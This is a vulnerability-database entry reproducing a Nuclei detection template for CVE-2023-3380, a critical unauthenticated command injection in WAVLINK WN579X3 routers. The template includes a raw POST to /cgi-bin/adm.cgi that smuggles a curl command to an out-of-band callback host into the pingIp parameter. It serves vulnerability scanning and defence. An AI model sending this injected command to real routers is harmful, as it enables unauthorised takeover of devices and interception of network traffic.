Lucene search
K

WAVLINK WN579X3 - Remote Command Execution

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

WAVLINK WN579X3 - Remote Command Execution vulnerability via pingIp parameter

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WAVLINK WN579X3 注入漏洞
23 Jun 202300:00
cnnvd
CVE
CVE-2023-3380
23 Jun 202309:31
cve
Cvelist
CVE-2023-3380 Wavlink WN579X3 Ping Test adm.cgi injection
23 Jun 202309:31
cvelist
NVD
CVE-2023-3380
23 Jun 202310:15
nvd
OSV
CVE-2023-3380
23 Jun 202310:15
osv
Prion
Design/Logic Flaw
23 Jun 202310:15
prion
Positive Technologies
PT-2023-24503 · Wavlink · Wavlink Wn579X3
23 Jun 202300:00
ptsecurity
RedhatCVE
CVE-2023-3380
23 May 202502:15
redhatcve
id: CVE-2023-3380

info:
  name: WAVLINK WN579X3 - Remote Command Execution
  author: pussycat0x
  severity: critical
  description: |
    Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.
  impact: |
    Unauthenticated attackers can execute arbitrary commands through the pingIp parameter in the adm.cgi endpoint, potentially compromising the entire WAVLINK router and intercepting network traffic.
  remediation: |
    Update WAVLINK WN579X3 firmware to a patched version that properly sanitizes the pingIp parameter and prevents command injection in adm.cgi.
  reference:
    - https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md
    - https://vuldb.com/?ctiid.232236
    - https://vuldb.com/?id.232236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3380
    cwe-id: CWE-74
    epss-score: 0.0388
    epss-percentile: 0.88904
    cpe: cpe:2.3:o:wavlink:wn579x3_firmware:*:*:*:*:*:*:*:*
  metadata:
    vendor: wavlink
    product: wn579x3_firmware
    shodan-query: http.html:"Wavlink"
  tags: cve,cve2023,wavlink,rce,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "images/WAVLINK-logo.png"
          - "<title>Wi-Fi APP Login</title>"
        condition: and
        internal: true

  - raw:
      - |
        POST /cgi-bin/adm.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/ping.shtml

        page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e19029ff91c013b38a0e8d14da410cfb1c9db24270d0fc6900879ffe1ffb29bc0220532e6db08f6a244d66d20c312bf52d35d9ebbe823b18dabfbf67cec247c1f358:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.14.7 - 9.8
CVSS 25.8
CVSS 34.7
EPSS0.0388
35